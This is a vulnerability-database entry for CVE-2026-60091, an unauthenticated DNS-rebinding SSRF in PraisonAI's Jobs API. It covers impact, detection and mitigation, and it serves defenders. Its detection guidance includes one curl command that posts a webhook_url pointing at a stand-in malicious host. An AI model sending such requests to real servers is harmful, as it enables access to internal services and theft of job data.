CVE-2026-60091
Received Received - Intake

Unauthenticated SSRF in PraisonAI via DNS Rebinding

Vulnerability report for CVE-2026-60091, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-10

Last updated on: 2026-07-10

Assigner: VulnCheck

Description

PraisonAI before 4.6.78 contains an unauthenticated server-side request forgery vulnerability in the Jobs API /api/v1/runs endpoint. The webhook_url parameter is validated at request time but re-resolved at connection time, allowing attackers to use DNS rebinding to reach internal services with a blind SSRF attack.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-10
Last Modified
2026-07-10
Generated
2026-07-10
AI Q&A
2026-07-10
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
mervinpraison praisonai to 4.6.78 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-60091 is an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in PraisonAI versions before 4.6.78, specifically in the Jobs API endpoint `/api/v1/runs`.

The vulnerability arises because the `webhook_url` parameter is validated at the time the request is received but is re-resolved at the time the connection is made. This Time-of-Check Time-of-Use (TOCTOU) flaw allows attackers to exploit DNS rebinding to bypass restrictions and make the server send requests to internal services that are normally inaccessible.

Since the API is unauthenticated by default, attackers can submit malicious POST requests with crafted `webhook_url` values to trigger blind SSRF attacks, forcing the server to interact with internal endpoints without receiving responses.

Compliance Impact

The vulnerability allows unauthenticated attackers to perform Server-Side Request Forgery (SSRF) attacks, potentially accessing internal services and exfiltrating job results to attacker-controlled webhooks.

Such unauthorized access and data exfiltration could lead to exposure of sensitive information, which may violate data protection regulations like GDPR or HIPAA that require safeguarding personal and sensitive data.

Additionally, the lack of enforced authentication by default increases the risk of unauthorized data access, further impacting compliance with standards that mandate strict access controls and data security.

Impact Analysis

This vulnerability can have several impacts:

  • Attackers can reach internal services that are normally protected, potentially exposing sensitive internal resources.
  • Unauthorized job submissions can occur, which may lead to abuse such as increased costs related to large language model (LLM) usage.
  • Attackers can exfiltrate job results by forcing the server to send data to attacker-controlled webhooks.
  • Because the API is unauthenticated by default, the attack surface is larger and easier to exploit.
Detection Guidance

The vulnerability involves unauthenticated POST requests to the /api/v1/runs endpoint with a malicious webhook_url parameter that exploits SSRF via DNS rebinding. Detection can focus on monitoring network traffic for unusual POST requests to this endpoint, especially those containing suspicious webhook_url values.

You can use network monitoring tools or web server logs to identify such requests. For example, using curl or similar tools to simulate or detect such requests might help.

  • Use curl to test the endpoint: curl -X POST http://<praisonai-server>/api/v1/runs -d '{"webhook_url":"http://malicious.example.com"}' -H 'Content-Type: application/json'
  • Check web server or application logs for POST requests to /api/v1/runs with webhook_url parameters.
  • Monitor network traffic for DNS rebinding attempts or unusual internal service access triggered by external requests.
Mitigation Strategies

The primary mitigation is to upgrade PraisonAI to version 4.6.78 or later, where this vulnerability is fixed.

Additional immediate steps include enforcing authentication on the Jobs API by setting the PRAISONAI_JOBS_API_KEY environment variable, which restricts access to authorized users only.

Other recommended mitigations are to ensure the webhook_url IP address is resolved once and pinned for the connection to prevent DNS rebinding, and to disable redirects in the HTTP client.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-60091. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart